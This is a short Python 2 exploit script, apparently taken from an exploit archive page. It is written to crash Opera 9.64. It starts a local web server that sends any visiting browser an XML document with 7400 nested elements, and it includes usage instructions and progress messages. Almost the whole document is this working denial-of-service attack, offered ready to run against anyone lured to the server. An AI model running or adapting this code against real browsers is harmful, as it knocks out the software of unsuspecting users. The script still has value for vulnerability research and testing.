Opera version 9.64 (7400 nested elements) XML parsing remote crash exploit.
5cb5b9f155d8943d137b3ca3dc40cdf8fd7267a79da07db420881ea0bb0d5b96#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Similar to the bug found by Wojciech Pawlikowski for Firefox
# -> https://www.milw0rm.com/exploits/8306
#
# - Tested using the latest version of Opera (9.64)
#
# Usage : python opera.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_exploit(self):
exploit = '<A>' * 7400
exploit = '<xml>' + exploit + '</xml>'
return exploit
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
print '[-] Sending header to %s ...' % self.client_address[0]
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
print '[-] Header sent to %s' % self.client_address[0]
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port]' % sys.argv[0]
sys.exit(1)
try:
port = int(sys.argv[1])
if port < 1 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at https://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except KeyboardInterrupt:
print '[-] Exiting ...'
except socket.error:
print '[*] ERROR: a socket error has occurred ...'
sys.exit(-1)
except ValueError:
print '[*] ERROR: invalid port number ...'
sys.exit(-1)
if __name__ == '__main__':
main()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed